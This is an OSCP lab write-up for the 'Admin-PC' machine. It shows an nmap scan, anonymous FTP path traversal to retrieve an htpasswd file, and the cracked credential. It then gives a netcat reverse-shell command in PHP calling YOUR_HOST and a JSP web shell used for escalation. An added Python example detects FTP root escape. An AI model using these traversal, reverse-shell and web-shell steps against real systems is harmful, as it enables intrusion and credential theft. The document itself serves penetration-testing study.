OSCP Admin-PC machine write-up
Exploitation
Scan the machine with nmap:
nmap 192.168.x.55 -A
One interesting part is the FTP service output:
21/tcp open ftp syn-ack ttl 128
| fingerprint-strings:
|   GenericLines:
|     220-Wellcome to Home Ftp Server!
|     Server ready.
|     command not understood.
|     command not understood.
|   Help:
|     220-Wellcome to Home Ftp Server!
|     Server ready.
|     'HELP': command not understood.
|   NULL, SMBProgNeg:
|     220-Wellcome to Home Ftp Server!
|_    Server ready.
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drw-rw-rw- 1 ftp ftp 0 Dec 28 2015 . [NSE: writeable]
|_drw-rw-rw- 1 ftp ftp 0 Dec 28 2015 .. [NSE: writeable]
Connect to the server and get the XAMPP config file
Use user anonymous with any password:
[root:~/Desktop]# ftp
ftp> o
(to) 192.168.x.55
Connected to 192.168.x.55.
220-Wellcome to Home Ftp Server!
220 Server ready.
Name (192.168.x.55:root): anonymous
331 Password required for anonymous.
Password:
230 User Anonymous logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get ../xampp/security/webdav.htpasswd
local: ../xampp/security/webdav.htpasswd remote: ../xampp/security/webdav.htpasswd
200 Port command successful.
150 Opening data connection for ../xampp/security/webdav.htpasswd.
226 File sent ok
The file contains the credentials as an Apache htpasswd ($apr1$) hash:
fm:$apr1$yT3K79by$RbmkKdKGdaXs80zPCIZnR1
Crack the password hash and you will get the plaintext:
fm:x-files
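The `get ../xampp/security/webdav.htpasswd` request in the FTP session above worked because the server followed `..` out of the anonymous root. The check an FTP service should apply before serving a path, as an added example that is not part of the original write-up: the root `C:\ftproot`, the function names and the sample session are assumptions constructed for illustration.

```python
import ntpath  # Windows path rules, importable on any OS

def resolve_in_root(root, requested):
    """Map an FTP path argument to a path under root, or None if it escapes.

    Lexical check only: a real server must also resolve junctions/symlinks.
    """
    req = requested.replace("/", "\\")
    drive, _ = ntpath.splitdrive(req)
    if drive:  # drive-qualified ("C:\...") or UNC ("\\host\share\...")
        return None
    root_n = ntpath.normpath(root)
    # A leading separator means "FTP root", so strip it before joining.
    candidate = ntpath.normpath(ntpath.join(root_n, req.lstrip("\\")))
    cand_c, root_c = ntpath.normcase(candidate), ntpath.normcase(root_n)
    # The trailing separator stops a sibling such as C:\ftproot2 from matching.
    if cand_c == root_c or cand_c.startswith(root_c + "\\"):
        return candidate
    return None

def escaping_requests(root, session):
    """Return the (user, command) pairs whose path argument leaves root."""
    flagged = []
    for user, command in session:
        verb, _, arg = command.partition(" ")
        if verb.upper() in {"RETR", "STOR", "CWD", "LIST", "DELE"} and arg:
            if resolve_in_root(root, arg) is None:
                flagged.append((user, command))
    return flagged

FTP_ROOT = r"C:\ftproot"  # assumed anonymous root, not stated in the write-up
SAMPLE_SESSION = [        # constructed command log for the demonstration
    ("anonymous", "RETR pub/readme.txt"),
    ("anonymous", "RETR ../xampp/security/webdav.htpasswd"),
    ("anonymous", "CWD pub/../.."),
    ("anonymous", "RETR C:/xampp/security/webdav.htpasswd"),
    ("anonymous", "STOR ../ftproot2/x.txt"),
]

if __name__ == "__main__":
    for user, command in escaping_requests(FTP_ROOT, SAMPLE_SESSION):
        print(f"outside root: {user}: {command}")
```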
Now connect to
192.168.x.55:10433/admin
which is a file manager that allows executable files.
Upload netcat.exe, then upload a PHP file containing system('nc -vv YOUR_HOST 443 -e cmd.exe'); to gain shell access.
Escalation
Upload a JSP shell file to c:/xampp/tomcat/webapps/examples
then browse to it at 192.168.x.55:10433/examples/cmd.jsp?cmd=whoami
And you’re an admin